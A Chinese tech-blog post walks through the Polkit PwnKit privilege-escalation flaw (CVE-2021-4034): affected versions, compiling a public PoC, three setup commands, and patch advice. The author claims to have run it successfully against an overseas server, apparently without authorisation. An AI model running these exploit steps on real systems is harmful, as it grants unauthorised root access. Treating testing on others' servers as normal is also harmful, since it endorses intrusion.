前言:今早看到了Linux提权的POC,想着验证一下,于是有了下面的文章,有漏洞的赶紧给自己补了,提权测试了一台境外的服务器都是成功的。
**0x01 漏洞介绍
**
漏洞成因:
该漏洞主要是由于Linux 下 Polkit 工具集的本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权限。
漏洞状态:
漏洞PoC已公开
**
影响范围**
`Debain stretch policykit-1 < 0.105-18+deb9u2``Debain buster policykit-1 < 0.105-25+deb10u1``Debain bookworm, bullseye policykit-1 < 0.105-31.1``Ubuntu 21.10 (Impish Indri) policykit-1 < 0.105-31ubuntu0.1``Ubuntu 21.04 (Hirsute Hippo) policykit-1 Ignored (reached end-of-life)``Ubuntu 20.04 LTS (Focal Fossa) policykit-1 < 0.105-26ubuntu1.2)``Ubuntu 18.04 LTS (Bionic Beaver) policykit-1 < 0.105-20ubuntu0.18.04.6)``Ubuntu 16.04 ESM (Xenial Xerus) policykit-1 < 0.105-14.1ubuntu0.5+esm1)``Ubuntu 14.04 ESM (Trusty Tahr) policykit-1 < 0.105-4ubuntu3.14.04.6+esm1)``CentOS 6 polkit < polkit-0.96-11.el6_10.2``CentOS 7 polkit < polkit-0.112-26.el7_9.1``CentOS 8.0 polkit < polkit-0.115-13.el8_5.1``CentOS 8.2 polkit < polkit-0.115-11.el8_2.2``CentOS 8.4 polkit < polkit-0.115-11.el8_4.2`
**
0x02 准备实战环境
**
一台服务器:Ubuntu系统
0x03 准备提权POC
网上公开的CVE-2021-4034提权C文件
bash脚本后台发送"FUCKUSA"获取链接(POC已公开)
0x04 编译POC
编译环境:
ubuntu系统
编译文件:
cve-2021-4034.c
pwnkit.c
编译语句:
make
**0x05 执行POC
**
`echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules``mkdir -p GCONV_PATH=.``cp /usr/bin/true GCONV_PATH=./pwnkit.so:.`
0x06 修复方案
建议受影响用户参照官方安全通告将Polkit 工具集升级到安全版本或更高版本
end
投稿方式
欢迎投稿并加入我们,请联系公众号:Golden-Qianjiang
加群方式:
金色钱江
关注金色钱江,体验全能技术王者之路!
公众号
金色钱江,讲述杭州IT精英的成长之路!
关注金色钱江,体验全能技术王者之路!